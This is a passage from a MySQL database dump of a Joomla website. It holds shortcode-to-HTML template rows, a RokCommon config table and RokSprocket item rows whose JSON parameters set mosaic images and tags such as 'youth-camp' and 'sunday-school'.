(163, 34, '[shadow][/shadow]', '<div class=\"block-shadow\"> </div>', 1, 0, '0000-00-00 00:00:00', 40, ''),
(164, 34, '[video width=\"{wid}\" height=\"{hei}\" poster=\"{poster}\"]{sources}[/video]', '<video width=\"{wid}\" height=\"{hei}\" preload=\"none\" poster=\"{poster}\">{sources}</video>', 1, 0, '0000-00-00 00:00:00', 41, ''),
(165, 34, '[source type=\"{type}\" url=\"{path}\"][/source]', '<source type=\"{type}\"  src=\"{path}\" />', 1, 0, '0000-00-00 00:00:00', 42, ''),
(167, 34, '[customers]{sets}[/customers]', '<div class=\"customers\">{sets}</div>', 1, 0, '0000-00-00 00:00:00', 44, ''),
(168, 34, '[set]{logos}[/set]', '<div class=\"client\">{logos}</div>', 1, 0, '0000-00-00 00:00:00', 45, ''),
(169, 34, '[column four-fifths]{content}[/column]', '<div class=\"uk-width-medium-4-5\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 36, ''),
(170, 34, '[pricing columns=\"{cols}\"]{features}[/pricing]', '<div class=\"pricing {cols}\">{features}</div>', 1, 0, '0000-00-00 00:00:00', 46, ''),
(171, 34, '[price-col table-config=\"{config}\" table-caption=\"{title}\" action-url=\"{url}\" action-caption=\"{caption}\"]{list}[/price-col]', '<div class=\"price-col {config}\"><div class=\"th\"><div class=\"overlay\"><span class=\"title\">{title}</span></div></div><div class=\"p-inner\"><ul class=\"feature\">{list}</ul><span class=\"call-action\"><a class=\"button-color\" href=\"{url}\">{caption}</a></span></div></div>', 1, 0, '0000-00-00 00:00:00', 47, ''),
(172, 34, '[price-tag]{amount}[/price-tag]', '<li class=\"price-tag\">{amount}</li>', 1, 0, '0000-00-00 00:00:00', 48, ''),
(173, 34, '[sub]{text}[/sub]', '<sub>{text}</sub>', 1, 0, '0000-00-00 00:00:00', 49, ''),
(174, 34, '[button arrow href=\"{url}\"]{text}[/button]', '<a href=\"{url}\" class=\"button-arrow\">{text}</a>', 1, 0, '0000-00-00 00:00:00', 21, ''),
(175, 34, '[audio src=\"{path}\" type=\"{type}\"][/audio]', '<audio controls><source src=\"{path}\" type=\"{type}\"></audio>', 1, 0, '0000-00-00 00:00:00', 43, ''),
(177, 34, '[child_toggle state=\"{state}\" title=\"{title}\"]{text}[/child_toggle]', '<ul class=\"showhide child-toggle\"><li class=\"uk-toggle-{state}\"><i class=\"toggle-button\"></i><h4>{title}</h4><div>{text}</div></li></ul>', 1, 0, '0000-00-00 00:00:00', 50, ''),
(178, 34, '[list style=\"{style}\"]{list}[/list]', '<ul class=\"uk-list {style}\">{list}</ul>', 1, 0, '0000-00-00 00:00:00', 51, ''),
(179, 34, '[li icon=\"{icon}\"]{element}[/li]', '<li><i class=\"uk-{icon}\"></i>{element}</li>', 1, 0, '0000-00-00 00:00:00', 52, ''),
(180, 34, '[icon style=\"{icon}\"/]', '<i class=\"uk-{icon}\"></i>', 1, 0, '0000-00-00 00:00:00', 53, ''),
(181, 34, '[heading size=\"{size}\" style=\"{style}\"]{text}[/heading]', '<{size} class=\"{style}\">{text}</{size}>', 1, 0, '0000-00-00 00:00:00', 54, ''),
(182, 34, '[heading size=\"{size}\"]{text}[/heading]', '<{size}>{text}</{size}>', 1, 0, '0000-00-00 00:00:00', 55, ''),
(183, 34, '[badge style=\"{style}\"]{text}[/badge]', '<div class=\"uk-badge-{style} uk-badge\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 56, ''),
(184, 34, '[nested_list]{list}[/nested_list]', '<ul class=\"uk-list uk-nested-list\">{list}</ul>', 1, 0, '0000-00-00 00:00:00', 57, ''),
(185, 34, '[progress style=\"{style}\" width={width}]{text}[/progress]', '<div class=\"uk-progress {style}\"> <div class=\"uk-progress-bar\" style=\"width: {width}%\">{text}</div> </div>', 1, 0, '0000-00-00 00:00:00', 58, ''),
(186, 34, '[modal_box button style=\"{style}\" target=\"{target}\"]{content}[/modal_box]', '<a class=\"uk-button uk-button-{style}\" href=\"#{target}\" data-uk-modal>{content}</a>', 1, 0, '0000-00-00 00:00:00', 59, ''),
(187, 34, '[modal_box link target=\"{target}\"]{content}[/modal_box]', '<a href=\"#{target}\" data-uk-modal>{content}</a>', 1, 0, '0000-00-00 00:00:00', 60, ''),
(188, 34, '[modal_box content target=\"{target}\" style=\"{style}\"]{content}[/modal_box]', '<div id=\"{target}\" class=\"uk-modal\"><div class=\"uk-modal-dialog uk-modal-dialog-slide {style}\"><a href=\"\" class=\"uk-modal-close uk-close\"></a>{content}</div></div>', 1, 0, '0000-00-00 00:00:00', 61, ''),
(189, 34, '[column size=\"{size}\"]{content}[/column]', '<div class=\"uk-width-medium-{size}\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 62, ''),
(190, 34, '[grid]{elements}[/grid]', '<div class=\"uk-grid\" data-uk-grid-margin>{elements}</div>', 1, 0, '0000-00-00 00:00:00', 63, ''),
(192, 34, '[alert close-button style=\"{style}\"]{text}[/alert]', '<div class=\"uk-alert uk-alert-{style}\"  data-uk-alert><a href=\"#\" class=\"uk-alert-close uk-close\"></a> {text}</div>', 1, 0, '0000-00-00 00:00:00', 65, ''),
(193, 34, '[button style=\"{style}\" href=\"{url}\" target=\"{target}\"]{text}[/button]', '<a class=\"uk-button-{style} uk-button\" href=\"{url}\" target=\"{target}\">{text}</a>', 1, 0, '0000-00-00 00:00:00', 66, ''),
(194, 34, '[icon_button icon=\"{icon}\" url=\"{url}\" target=\"{target}\"]{text}[/icon_button]', '<a href=\"{url}\" class=\"uk-icon-button uk-{icon}\" target=\"{target}\">{text}</a>', 1, 0, '0000-00-00 00:00:00', 67, ''),
(195, 34, '[list]{items}[/list]', '<ul>{items}</ul>', 1, 0, '0000-00-00 00:00:00', 68, ''),
(196, 34, '[child_grid]{elements}[/child_grid]', '<div class=\"uk-grid\">{elements}</div>', 1, 0, '0000-00-00 00:00:00', 69, '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_rokcommon_configs`
--

CREATE TABLE `y57u5_rokcommon_configs` (
  `id` int(11) NOT NULL,
  `extension` varchar(45) NOT NULL DEFAULT '',
  `type` varchar(45) NOT NULL,
  `file` varchar(256) NOT NULL,
  `priority` int(10) NOT NULL DEFAULT '10'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Dumping data for table `y57u5_rokcommon_configs`
--

INSERT INTO `y57u5_rokcommon_configs` (`id`, `extension`, `type`, `file`, `priority`) VALUES
(60, 'roksprocket', 'library', '/components/com_roksprocket/lib', 10),
(59, 'roksprocket', 'container', '/components/com_roksprocket/container.xml', 10);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_roksprocket_items`
--

CREATE TABLE `y57u5_roksprocket_items` (
  `id` int(11) NOT NULL,
  `module_id` varchar(45) NOT NULL,
  `provider` varchar(45) NOT NULL,
  `provider_id` varchar(45) NOT NULL,
  `order` int(10) UNSIGNED NOT NULL,
  `params` text
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_roksprocket_items`
--

INSERT INTO `y57u5_roksprocket_items` (`id`, `module_id`, `provider`, `provider_id`, `order`, `params`) VALUES
(1200, '316', 'joomla', '71', 1, '{\"lists_item_title\":\"-default-\",\"lists_item_image\":\"-default-\",\"lists_item_link\":\"-default-\",\"lists_item_description\":\"-default-\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"tabs_item_description\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":null,\"features_item_title\":\"-default-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"features_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"features_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1198, '315', 'joomla', '78', 8, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/9.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_78__params_mosaic_item_image\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"print-design, logo-design\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1197, '315', 'joomla', '77', 7, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/8.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_77__params_mosaic_item_image\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"logo-design, print-design\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1196, '315', 'joomla', '70', 6, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/6.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_70__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"web-design\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1195, '315', 'joomla', '76', 5, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/7.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_76__params_mosaic_item_image\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"web-design, logo-design\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1189, '319', 'joomla', '78', 8, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/9.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_78__params_mosaic_item_image\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"youth-camp\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1188, '319', 'joomla', '77', 7, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/8.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_77__params_mosaic_item_image\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"youth-camp\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1187, '319', 'joomla', '70', 6, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/6.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_70__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"sunday-school\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1186, '319', 'joomla', '76', 5, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/7.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_76__params_mosaic_item_image\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"sunday-school\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1185, '319', 'joomla', '73', 4, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/5.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_73__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"couples-meeting\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1203, '361', 'joomla', '86', 1, '{\"tabs_item_title\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"tabs_item_link\":\"-default-\",\"tabs_item_description\":\"-default-\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":null,\"features_item_title\":\"-default-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"lists_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"features_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"features_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
